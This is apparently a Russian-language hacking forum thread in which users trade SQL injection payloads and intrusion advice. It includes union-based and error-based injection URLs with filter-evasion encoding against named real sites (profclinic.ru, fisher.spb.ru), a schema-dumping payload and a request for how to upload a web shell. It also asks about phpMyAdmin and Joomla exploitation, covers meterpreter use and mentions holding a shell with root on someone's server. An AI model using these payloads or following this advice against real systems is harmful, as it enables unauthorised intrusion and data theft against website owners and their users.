_http://profclinic.ru/search/?search_string=oops'&x=0&y=0 _http://profclinic.ru/search/?search_string=oopss%27%29%0AAND%0A5851=5851%0Aunion%0Aall%0Aselect%0A1,2,3,4,5,6,7,8,%0A%23&x=0&y=0 Пробелы на %0A корректно заменяются, с запятой сложнее. Начало параметра лучше рандомизировать, т.к. где-то на пути кеширование.
Error-based: Code: [I]o[/I][I]ops%27%29or[/I][I]%281%29group%09by%09[/I][I]mid%28%28SELEC[/I][I]T%09version[/I][I]%28%29%29[/I][I]%09from%09ra[/I][I]nd%280%29%09for[/I][I]%099e9%29%[/I][I]09having%09min%28[/I][I]0%29%23&x=0&y=0[/I] Duplicate entry 'version' for key 'group_key См. https://rdot.org/forum/showthread.php?t=245, последний пост с вектором без использования запятых.
XAMEHA, да, примерно так и работал. Спасибо за линк. Возник вопрос по жумле. Если нигде на морде нет уютной кнопки "восстановить пароль", значит ли это, что в двиге фича рестора выключена? Если нет, какие у 1.5 ветки прямые линки на запрос восстановления и на ввод кода с почты?
А подскажите следующую вещь. В armitage применяю эксплоит, всё успешно. потом получаю доступ к файловой системе и cmd. Но, когда пытаюсь запустить какое-нибудь приложение (которое я забросил юзеру), оно или не запускается, или висит в процессах, в общем ведет себя неадекватно. Например ,вызываю удаленную консоль, набираю в ней C:\Windows\system32> notepad.exe Блокнот на удаленной ХР запускается, но только висит в процессах, без всякого GUI (т.е. приложение визуально не открывается). То же самое и с другими ехе-шниками. Такая же история с meterpreter> execute -f notepad.exe Процесс появляется, но визуально блокнот не запускается
Видимо, у них давилка окон есть, чтобы случайно что-нибудь не вылезло. В winapi есть какие-то ключики для этого. Попробуйте либо почитать доки от msf, либо запилить notepad в батник.
Да нет, система XP моя, поставил для опытов. Причем БЕЗ сервиспаков. Нулевая можно сказать. Ни антивируса, ни давилки, ничего осложняющего.
запилил. содержание файла "start C:\Windows\System32\notepad.exe" та же песня, блокнот запускается без gui
Привет всем) У меня такая проблема: есть phpMyAdmin 2.11.11.3 Версия достаточно старая, но никакого сплойта не могу найти, активное гуглование не помогает. Подскажите знающие пожалуйста)
Давайте повангую. Есть /scripts/setup.php, но не /config/. До кучи /phpmyadmin/ + /pma/ по всем соседям, но плоентов нет. И да, по эту версию так и не нашлось ничего стоящего.
Как залить шелл, какой вариант? Пароли сбрутить не удалось Code: http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6+--+
1. Исследование соседей. 2. Пошаманьте с /Club/contest/vne/forum/gallery/index.php?event=addform&gid=&se=-300154264
Сайт постороен на базе HostCMS. Ищите паблик эксплоиты, если не найдете- качайте исходники этой CMS (на сайте есть, правда с ограничением), и проводите анализ.
Интересует следующий вопрос: 1. Есть сайт site.com с шеллом на нём. Также, имеется доступ к серверу из под Root-а. Проблема, конечно не совсем прямо относится к уязвимостям, но всё же, для проверки возможности редактирования файлов и правильности путей был выбран файл в корне x.php, содержание которого: HTML: <?php print "server_test1_for_admin"; ?> При изменении текста текста в print-е - ничего не происходит. При изменении имени файла на x1.php - файл становится не доступен по адресу site.com/x.php и становится доступен по адресу site.com/x1.php, т.е. всё вроде бы нормально, но текст в x.php и x1.php всё равно один и тот же Дело, навряд ли в корневом htaccess: Code: AddDefaultCharset UTF-8 #RewriteEngine on #RewriteCond %{REQUEST_URI} !/1.html$ ##RewriteCond %{REMOTE_HOST} !^888\.888\.888\.888 #RewriteRule $ /1.html [R=302,L] # compress all text & html: #AddOutputFilterByType DEFLATE text/html text/plain text/xml RewriteEngine on # Redirects to www. version RewriteCond %{HTTP_HOST} ^site\.com [NC] RewriteRule ^(.*)$ http://www.site.com/$1 [L,R=301] RewriteCond %{HTTP_HOST} ^site\.com [NC] RewriteRule ^(.*)$ http://www.site.com/$1 [L,R=301] RewriteCond %{HTTP_HOST} ^site1\.com [NC] RewriteRule ^(.*)$ http://www.site1.com/$1 [L,R=301] RewriteCond %{HTTP_HOST} ^site1\.com [NC] RewriteRule ^(.*)$ http://www.site1.com/$1 [L,R=301] # Send all requests except some to index.php RewriteCond %{REQUEST_URI} !^/1/ RewriteCond %{REQUEST_URI} !^/2/ RewriteCond %{REQUEST_URI} !^/3/ RewriteCond %{REQUEST_URI} !^/4/ RewriteCond %{REQUEST_URI} !^/5/ RewriteRule ^(.+)$ index.php [L] Order allow,deny Allow from all Deny from IP1 Deny from IP2 В чём может быть причина, если не в корневом хтаче? В какую сторону копать?
Aniweste, скорее всего, кеширование либо на сервере, либо на стороне клиента. Вопрос банальный, но кеш чистили? Попробуйте "приватный режим" или другой браузер. И попробуйте заменить .php на .txt.
Спасибо за ответ. Кеширование точно не на стороне клиента. Пробовал и другой браузер и очистку кеша. Тогда прошу помощи в доп. вопросе - если кеширование на стороне сервера, то где располагается кеш? В корне сайта нету папок, в которых были бы кешированные страницы, тогда где они могли бы быть?
